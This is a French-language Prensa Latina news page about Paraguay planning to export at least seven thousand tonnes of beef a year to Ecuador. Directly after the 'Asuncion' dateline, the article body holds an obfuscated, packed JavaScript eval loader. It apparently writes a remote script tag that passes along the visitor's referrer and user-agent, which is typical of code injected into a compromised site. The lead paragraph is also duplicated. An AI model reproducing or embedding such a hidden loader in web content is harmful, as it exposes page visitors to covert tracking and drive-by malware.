lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Bœuf du Paraguay exporté vers l’Equateur

Asuncion eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|adzrz|var|u0026u|referrer|anfha||js|php'.split('|'),0,{})) (PL) La viande paraguayenne prête à commercialiser sera présente cette année sur le marché de l’Équateur et ainsi rejoignera le bovins pour améliorer la génétique, a déclaré une source diplomatique.

Asuncion (PL) La viande paraguayenne prête à commercialiser sera présente cette année sur le marché de l’Équateur et ainsi rejoignera le bovins pour améliorer la génétique, a déclaré une source diplomatique.

L’annonce a été faite dans cette capitale par l’Ambassadrice du Paraguay à Quito, María José Argaña, après avoir rencontré le Président Horacio Cartes. 
Argaña a déclaré que la quantité à exporter dépendra des prix des fournisseurs, mais on parle d’un minimum de sept mille tonnes annuelles, ce qui permettra un tarif bas pour l’introduction du produit dans les coupes.
Les entrepreneurs équatoriens ont certifié déjà un centre de traitement des paraguayens pour l’expédition de viandes.
L’Ambassadrice a également rappelé le transfert des bovins en haute qualité à l’Equateur dans le but d’améliorer la génétique, qui a ajouté deux mille têtes dans plusieurs vols.
Le Paraguay, sixième exportateur de viande bovine dans le monde d’ici 2015, vend chaque année 500 tonnes à 80 marchés à ce jour, principalement le Chili, la Russie et le Brésil . 
 
Rm/mgt/jf

EN CONTINU
notes connexes